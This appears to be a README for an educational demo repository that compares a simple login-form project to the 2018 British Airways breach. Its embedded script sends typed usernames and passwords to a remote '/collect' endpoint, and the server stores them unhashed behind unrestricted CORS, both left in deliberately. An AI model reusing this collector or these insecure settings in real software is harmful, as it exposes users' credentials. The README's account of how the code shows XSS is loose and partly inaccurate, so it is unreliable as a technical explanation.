This project is intended for educational purposes only. Cross-Site Scripting (XSS) is a security vulnerability that should only be tested responsibly and with proper authorization. Unauthorized testing of XSS vulnerabilities is illegal and unethical.
This project demonstrates a Cross-Site Scripting (XSS) attack using a simple login form. The server collects login data and saves it to a JSON file.
- Ensure you have Node.js installed on your machine. You can download it from Node.js.
- Ensure you have Git installed on your machine. You can download it from Git.
- Clone the repository to your local machine.
- Navigate to the project directory.
- Install the dependencies by running the following command:
npm install
- It is recommended to run this project in a local or isolated environment due to potentially sensitive login data. But you can run on GitHub Codespace as well.
- Start the server by running the following command:
node server.js
<form id="loginForm">
<label for="username">Username:</label>
<input type="text" id="username" name="username" required><br><br>
<label for="password">Password:</label>
<input type="password" id="password" name="password" required><br><br>
<button type="button" id="loginButton">Login</button>
</form>
<script>
const apiUrl = 'https://unearthly-hex-679pp459qqgh574r-8001.app.github.dev/collect';
function sendLoginToAPI(event) {
event.preventDefault();
alert("Login button clicked!");
const username = $('#username').val();
const password = $('#password').val();
if (!username || !password) {
alert("Both username and password are required.");
return;
}
$.ajax({
url: apiUrl,
method: 'POST',
contentType: 'application/json',
data: JSON.stringify({ username: username, password: password }),
success: function(data) {
console.log('Login response:', data);
alert('Login successful!');
},
error: function(xhr, status, error) {
console.error('Login failed:', error);
alert('Invalid username or password.');
}
});
}
$('#loginButton').on('mousedown', sendLoginToAPI);
</script>Change your workspace name to your own workspace name in the apiUrl variable.
The client-side code handles the user input from the login form. When the login button is clicked, the sendLoginToAPI function is triggered. This function collects the username and password entered by the user and sends them to the server using an AJAX POST request. The server then processes this data and saves it to a JSON file. The XSS vulnerability could be exploited if an attacker injects malicious scripts into the username or password fields, which would then be executed when the data is processed or displayed.
View Demo Video
XSS.Demo.mp4
In 2018, British Airways experienced a significant data breach that affected approximately 400,000 customers. The breach was a result of attackers exploiting vulnerabilities in the British Airways website, allowing them to steal sensitive customer information, including personal and financial data. The incident highlighted the importance of robust security measures to protect user data and prevent unauthorized access.
This project simulates the British Airways data breach by demonstrating several key vulnerabilities that were present in the actual incident. Here are the specific ways in which this project mirrors the British Airways data breach:
-
Cross-Site Scripting (XSS): The project demonstrates how an attacker can inject malicious scripts into the username or password fields of a login form. This is similar to how attackers exploited vulnerabilities in the British Airways website to steal customer data. The client-side code in
client_code.htmland the server-side code inserver.jsillustrate this vulnerability. -
Insecure Data Storage: The project saves login data, including usernames and passwords, to a JSON file (
users.json) without any encryption or hashing. This mirrors the lack of proper data protection measures that contributed to the British Airways data breach. -
Lack of Input Validation: The server-side code in
server.jsperforms only basic validation for the presence of username and password fields. It does not sanitize or validate the input to prevent malicious data from being processed, similar to the insufficient input validation that allowed attackers to exploit the British Airways website. -
CORS Misconfiguration: The server in
server.jsenables CORS (Cross-Origin Resource Sharing) without any restrictions, which can allow unauthorized domains to interact with the server and potentially exploit vulnerabilities. This is akin to the misconfigurations that can lead to data breaches like the one experienced by British Airways.
These vulnerabilities highlight the importance of implementing proper security measures, such as input validation, data encryption, and secure CORS configurations, to protect against attacks and ensure the safety of user data.
For more information about the British Airways data breach, you can refer to the following links:
- British Airways hacked, hundreds of thousands of credit card numbers stolen
- British Airways fined £20m over data breach
- British Airways data breach: What you need to know
- British Airways data breach: What happened and what to do
These articles provide comprehensive insights into the breach, its impact, and the subsequent actions taken.
- Fork the repository.
- Create a new branch for your feature or bugfix.
- Commit your changes with a descriptive message.
- Push your changes to your forked repository.
- Create a pull request to the main repository.
This project is licensed under the Apache License, Version 2.0.